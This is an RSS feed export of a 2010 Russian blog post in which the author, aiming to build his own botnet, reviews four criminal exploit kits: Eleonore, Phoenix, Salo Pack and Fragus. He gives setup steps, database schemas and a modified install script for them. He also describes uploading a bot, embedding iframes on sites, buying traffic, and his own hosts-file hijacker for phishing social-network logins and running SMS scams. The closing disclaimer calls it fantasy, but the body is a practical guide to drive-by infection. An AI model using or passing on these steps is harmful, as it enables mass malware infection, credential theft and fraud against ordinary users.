<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>по стопам webkill&#039;а &#187; phoenix</title>
	<atom:link href="http://blog.lukmus.ru/tag/phoenix/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.lukmus.ru</link>
	<description>это наш химический дом для печальных жителей Земли</description>
	<lastBuildDate>Sat, 21 Oct 2023 19:10:13 +0000</lastBuildDate>
	<language>ru-RU</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.4.2</generator>
		<item>
		<title>полуприватные связки сплойтов</title>
		<link>http://blog.lukmus.ru/2010/07/15/poluprivatnyie-svyazki-sploytov/</link>
		<comments>http://blog.lukmus.ru/2010/07/15/poluprivatnyie-svyazki-sploytov/#comments</comments>
		<pubDate>Thu, 15 Jul 2010 17:50:10 +0000</pubDate>
		<dc:creator>lukmus</dc:creator>
				<category><![CDATA[hack]]></category>
		<category><![CDATA[eleonore]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[fragus]]></category>
		<category><![CDATA[phoenix]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[salo pack]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[связка сплойтов]]></category>

		<guid isPermaLink="false">http://blog.lukmus.ru/?p=236</guid>
		<description><![CDATA[Хочу я заиметь собственный скромненький небольшой ботнетик, поэтому начал присматриватся к связкам сплойтов. Покупать пока я не решился т.к. стоят они мягко сказать дохрена, хотя есть варианты с арендой но все же&#8230; Под связки нужно написать какого-нить бота, ну или купить. Конечно, лучше всего купить какого-нибудь Зевса, но стоит он чуть ли не дороже связок. [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/exploited.jpg"><img class="alignleft size-full wp-image-264" style="margin: 5px 10px;" title="exploited" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/exploited.jpg" alt="" width="191" height="189" /></a>Хочу я заиметь собственный скромненький небольшой ботнетик, поэтому начал присматриватся к связкам сплойтов. Покупать пока я не решился т.к. стоят они мягко сказать дохрена, хотя есть варианты с арендой но все же&#8230;</p>
<p>Под связки нужно написать какого-нить бота, ну или купить. Конечно, лучше всего купить какого-нибудь Зевса, но стоит он чуть ли не дороже связок. Поэтому я решил не торопить события и написал свою простенькую прожку, которая подменяет hosts на фейки соц.сетей, где собственно зараженный сначала отдаст мне свой логин с паролем, а затем получит окно с активацией под SMS. Префиксов, слава Богу, у меня хватало, так что дело встало за прогой, о ней я напишу в следующей статье. А пока перейдем к связкам.<span id="more-236"></span></p>
<p>Найти в паблике более-менне актуальные связки оказалось не такой уж и простой задачей, но я, гугл и яндекс все же справились с ней.<br />
Все связки я качал <a href="http://forum.k0d.cc/showthread.php?s=ad4c6e352e518d18107d2df9e55aa082&amp;p=27124" target="_blank">отсюда</a>, в связи с чем я очень благодарен этому форуму и тем кто выкладывал связки лично.</p>
<p><strong>То что я здесь расскажу скорее всего мало относится к приватным (платным) версиям этих связок и актуально только для этих полуприватных вариантов.</strong></p>
<p>Значит как я действовал:</p>
<ul>
<li>устанавливал связку на заренее подготовленный хостинг</li>
<li>закидывал свою программку</li>
<li>брал один из своих сайтиков и ставил туда iframe на связку</li>
<li>пробывал связку через Virtual Box с Windows XP на IE6, IE8 и FF 3.5</li>
<li>в случае если у какой-нибудь вариант из 3-х приведенных в пункте выше загружал программку, то покупал через одну систему обмена траффиком от 0.5 до 1к траффа</li>
</ul>
<p>Необходимо так же заметить, что установка этих вариантов этих связок обладает не самым дружественным интерфейсом и мне приходилось самому немного править некоторые скрипты. Короче без минимальных знаний PHP и маленького опыта работы с PHPMyAdmin тут не обойтись.</p>
<table style="height: 48px;" width="414">
<tbody>
<tr>
<td><img src="http://blog.lukmus.ru/wp-content/uploads/2010/07/elen.png" alt="" /></td>
<td>
<div style="font-size: 1.1em;"><strong>Eleonore Exp pack 1.3.1</strong></div>
</td>
</tr>
</tbody>
</table>
<p><strong>Установка</strong></p>
<p>После того как закинули на хостинг, делаем БД и прописываем настройки в файле &#8216;config.php&#8217;. В этом же файле строки:</p>
<blockquote><p>&lt;?php<br />
/*$to = &#8220;cmail014@gmail.com&#8221;;<br />
$from = &#8220;someonelse@example.com&#8221;;<br />
$headers = &#8220;From: $from&#8221;;<br />
mail($to,$subject,$headers,$admin,$pwd);*/<br />
?&gt;</p></blockquote>
<p>либо удаляем, либо комментируем.</p>
<p>Далее если мы почитаем файл readme.txt, то нам нужно запустить &#8216;install.php&#8217;, однако в данном варианте его нет, поэтому руками открываем файл &#8216;dump.sql&#8217; и создаем структуру БД в соответсвии с запросами приведенными там, а конкретнее:</p>
<blockquote><p>CREATE TABLE IF NOT EXISTS `seller` (<br />
`id` int(10) NOT NULL auto_increment,<br />
`name` varchar(30) default NULL,<br />
`link` varchar(150) default NULL,<br />
`desc` varchar(500) default NULL,<br />
PRIMARY KEY  (`id`)<br />
) ENGINE=MyISAM  DEFAULT CHARSET=cp1251 AUTO_INCREMENT=6 ;</p>
<p>и</p>
<p>CREATE TABLE IF NOT EXISTS `statistic` (<br />
`id` int(10) NOT NULL auto_increment,<br />
`ip` varchar(15) default NULL,<br />
`os` varchar(30) default NULL,<br />
`br` varchar(30) default NULL,<br />
`country` varchar(2) default &#8216;&#8211;&#8217;,<br />
`good` int(1) NOT NULL default &#8217;0&#8242;,<br />
`mv` int(1) NOT NULL default &#8217;0&#8242;,<br />
`refer` varchar(300) NOT NULL,<br />
`date` datetime default &#8217;2009-01-01 00:00:00&#8242;,<br />
`spl` varchar(30) default NULL,<br />
`seller` varchar(150) default NULL,<br />
PRIMARY KEY  (`id`)<br />
) ENGINE=MyISAM  DEFAULT CHARSET=cp1251 AUTO_INCREMENT=149 ;</p></blockquote>
<p>Теперь выставляем права на директорию load и все ее содержимое 0777.</p>
<p><strong>Эксплуатация</strong></p>
<p>Путь к админке: &lt;имя домена&gt;/stat.php.</p>
<p>В админке все предельно просто и понятно:</p>
<ul>
<li>в разделе Resseler добавляем продавца или просто место откуда льется трафф и нажав на ссылку Links info получим ссылку, которую нужно вставить в iframe;</li>
<li>в File загружаем нашего бота;</li>
<li>в Main смотрим статистику</li>
</ul>
<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/el1.png"><img class="aligncenter size-full wp-image-238" title="el1" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/el1.png" alt="" width="768" height="387" /></a></p>
<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/el2.png"><img class="aligncenter size-full wp-image-239" title="el2" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/el2.png" alt="" width="767" height="650" /></a><strong>Итоги</strong></p>
<p>Пробив плохой, а точнее на моих 2-х самых небезопасных в мире Windows XP без антивирей и без фаерволов, с самыми непропатченными браузерами в мире ничего не прокатило. Что касается интерфейса, то он достаточно хороший и приятный и самое главное удобный.</p>
<p>Вообщем, если в приватных версиях сплойты более работоспособны, то можно брать, правда цен я не знаю.</p>
<table style="height: 48px;" width="382">
<tbody>
<tr>
<td><img src="http://blog.lukmus.ru/wp-content/uploads/2010/07/FP_BLOG_100527_3.jpg" alt="" width="159" height="93" /></td>
<td>
<div style="font-size: 1.1em;"><strong>Phoenix exploit&#8217;s pack</strong></div>
</td>
</tr>
</tbody>
</table>
<p><strong>Установка</strong></p>
<ul>
<li>делаем БД с пользователем</li>
<li>правим конфиг configuration/config.php</li>
<li>заливаем бота в корень и называем его exe.exe (не факт, т.к. нет мануала, я решил что это наиболее вероятный вариант)</li>
<li>запускаем recrypt.php и следуем инструкциям</li>
</ul>
<p><strong>Эксплуатация</strong></p>
<p>Админка, если ее можно назвать таковой, находится по адресу &lt;имя домена&gt;/statistics.php.</p>
<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/ph.png"><img class="aligncenter size-full wp-image-243" title="ph" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/ph.png" alt="" width="790" height="281" /></a></p>
<p>Где смотреть ссыль под трафф я так и не нашел и методом тыка определил, что либо &lt;имя домена&gt;/index.php, либо &lt;имя домена&gt;/load.php.</p>
<p>Что касается пробива тут все плохо, и не смотря на то что на скрине стоит 100% пробива я могу сказать что он скорее нулевой.</p>
<p>Немного погуглив, я тут выяснил, что отвязали 2-ю версию phoenix и прочитать про нее можно <a href="http://datafrog.biz/topic/8/" target="_blank">здесь</a>.</p>
<table>
<tbody>
<tr>
<td><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/log_in.png"><img class="alignnone size-full wp-image-246" title="salo" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/log_in.png" alt="" width="128" height="128" /></a></td>
<td>
<div style="font-size: 1.1em;"><strong>SALO PACK © UASC</strong></div>
</td>
</tr>
</tbody>
</table>
<p><strong>Установка</strong></p>
<ul>
<li>создаем БД с пользователем</li>
<li>настраиваем cfg.php</li>
<li>запускаем sql.php</li>
</ul>
<p><strong>Эксплуатация</strong></p>
<p>Админка находится по адресу: &lt;имя домена&gt;/admin.</p>
<p>Во вкладке &#8216;Настройка&#8217; заливаем бота и производим другие настройки.</p>
<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/salo.png"><img class="aligncenter size-full wp-image-247" title="salo" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/salo.png" alt="" width="791" height="378" /></a></p>
<p>Ну и собственно ставим iframe на http://&lt;имя домена&gt;/index.php.</p>
<p><strong>Итоги</strong></p>
<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/salo2.png"><img class="aligncenter size-full wp-image-248" title="salo2" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/salo2.png" alt="" width="849" height="381" /></a></p>
<p>Статистика врет &#8211; пробив нулевой или неуклонно стремится к нему.</p>
<p>Интерфейс хороший, я бы даже сказал приятный и удобный, там даже есть AJAX&#8217;ое обновление. Статистика достаточно детальная, впрочем вы сами можете это видеть на скрине.</p>
<table style="height: 48px;" width="414">
<tbody>
<tr>
<td><img src="http://blog.lukmus.ru/wp-content/uploads/2010/07/logo.png" alt="" /></td>
<td>
<div style="font-size: 1.1em; text-align: center;"><strong>Fragus exploit pack v1.0<br />
</strong></div>
</td>
</tr>
</tbody>
</table>
<p><strong>Установка</strong></p>
<ul>
<li>создаем БД с пользователем под нее</li>
<li>правим конфиг /secure/config.php</li>
<li>открываем в редакторе /secure/_install.php и приводим его в следующий вид:<br />
<blockquote><p>&lt;?php<br />
include (&#8220;config.php&#8221;);<br />
if (!($c = mysql_connect($config['MysqlHost'], $config['MysqlUser'], $config['MysqlPassword']))) {<br />
die(&#8220;Check host, user or password (./cfg/config.php)&#8221;);<br />
}<br />
if (!mysql_select_db($config['MysqlDbname'],$c)) {<br />
die(&#8220;Check DB name (./cfg/config.php)&#8221;);<br />
}</p>
<p>if (!mysql_query(&#8220;DROP TABLE IF EXISTS `statistic`;&#8221;,$c)) die(&#8220;Check permission for user &#8216;&#8221;.$config['MysqlUser'].&#8221;&#8216;&#8221;);</p>
<p>if (!mysql_query(&#8220;CREATE TABLE `donkeys` (<br />
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,<br />
`ip` int(10) unsigned NOT NULL DEFAULT &#8217;0&#8242;,<br />
`seller` int(10) unsigned NOT NULL DEFAULT &#8217;0&#8242;,<br />
`browser` set(&#8216;MSIE&#8217;,'FIREFOX&#8217;,'OPERA&#8217;,'CHROME&#8217;,'SAFARI&#8217;,'OTHER&#8217;) NOT NULL DEFAULT &#8216;OTHER&#8217;,<br />
`browser_version` varchar(10) NOT NULL DEFAULT &#8217;0&#8242;,<br />
`os` set(&#8217;95&#8242;,&#8217;98&#8242;,&#8217;ME&#8217;,&#8217;2000&#8242;,&#8217;2003&#8242;,&#8217;XP&#8217;,'VISTA&#8217;,'WIN7&#8242;,&#8217;MAC&#8217;,'LINUX&#8217;,'OTHER&#8217;) NOT NULL DEFAULT &#8216;OTHER&#8217;,<br />
`os_version` set(&#8216;SP1&#8242;,&#8217;SP2&#8242;,&#8217;SP3&#8242;,&#8217;SP4&#8242;,&#8217;OTHER&#8217;) NOT NULL DEFAULT &#8216;OTHER&#8217;,<br />
`country` tinyint(3) unsigned NOT NULL DEFAULT &#8217;0&#8242;,<br />
`file` int(10) unsigned NOT NULL,<br />
`exploit` tinyint(2) unsigned NOT NULL DEFAULT &#8217;0&#8242;,<br />
`status` set(&#8216;NOT&#8217;,'LOAD&#8217;,'BACKCONNECT&#8217;) NOT NULL DEFAULT &#8216;NOT&#8217;,<br />
`time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,<br />
PRIMARY KEY (`id`),<br />
UNIQUE KEY `ip` (`ip`)<br />
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=1 ;&#8221;,$c)) die(&#8220;Check permission for user &#8216;&#8221;.$config['MysqlUser'].&#8221;&#8216;&#8221;);</p>
<p>die(&#8220;&lt;html&gt;&lt;head&gt;&lt;title&gt;Unique pack&lt;/title&gt;&lt;link type=&#8217;text/css&#8217; rel=&#8217;stylesheet&#8217; href=&#8217;./cfg/style.css&#8217;&gt;<br />
&lt;/head&gt;&lt;body bgcolor=&#8217;#E5E5E5&#8242; text=&#8217;black&#8217;&gt;<br />
&lt;center&gt;&lt;img src=&#8217;./img/logo.gif&#8217;&gt;&lt;br&gt;<br />
&lt;br&gt;Installation finished&lt;br&gt;Please delete install.php&lt;/center&gt;&lt;/body&gt;&lt;/html&gt;&#8221;);<br />
?&gt;</p></blockquote>
</li>
<li>теперь запускаем /secure/_install.php</li>
</ul>
<p><em>Примечание: я уже не помню где точно, но в процессе работы в админке могут вылетать различные MySQL ошибки, так вот для того чтобы их не было смотрим скрипт в котором была ошибка и заменям там в функциях mysql_connect() и mysql_select_db() переменные, которые теоретически равны пользователю, имени БД, хосту БД и паролю админа БД на те переменные, что указанны в конфиге т.е. $config['MysqlHost'], $config['MysqlUser'] и т.д. или на строки с этими значениями, последний вариант это кривое программирование, однако в данном случае он предпочтительнее.</em></p>
<p><strong>Эксплуатация</strong></p>
<p>Интерфейс просто шикарен.</p>
<p style="text-align: center;"><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/f1.png"><img class="aligncenter size-full wp-image-253" title="fragus1" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/f1.png" alt="" width="595" height="248" /></a></p>
<p style="text-align: center;"><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/f1.png"></a><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/f2.png"><img class="aligncenter size-full wp-image-254" title="fragus2" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/f2.png" alt="" width="596" height="303" /></a></p>
<p style="text-align: left;"><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/f3.png"><img class="aligncenter size-full wp-image-258" title="f3" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/f3.png" alt="" width="597" height="349" /></a></p>
<p style="text-align: left;">Я тут даже ничего описывать не буду, там и так все понятно. Хочу лишь отметить что ссыли в том числе и iframe связка выдает во всех возможных вариантах, включая криптованный.</p>
<p style="text-align: left;"><strong>Итоги</strong></p>
<p style="text-align: left;">Из всех рассмотренных связок Fragus самая лучшая по всем показателям. И не смотря на то что она уже относительно древняя у нее не плохой пробив для публичной (1.68% это не совсем верно т.к. весомая часть трафика который я туда лил заведомо не мог прокатить, примерный пробив составит около 3-6%).</p>
<p style="text-align: left;"><a href="http://blog.lukmus.ru/wp-content/uploads/2010/07/fstat.png"><img class="aligncenter size-full wp-image-259" title="fstat" src="http://blog.lukmus.ru/wp-content/uploads/2010/07/fstat.png" alt="" width="707" height="791" /></a></p>
<p style="text-align: left;">P.S. я был бы очень благодарен всем кто скинул бы сюда или мне лично ссылку на публичную или полуприватную связку, не рассмотренную здесь.</p>
<pre>Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.</pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.lukmus.ru/2010/07/15/poluprivatnyie-svyazki-sploytov/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
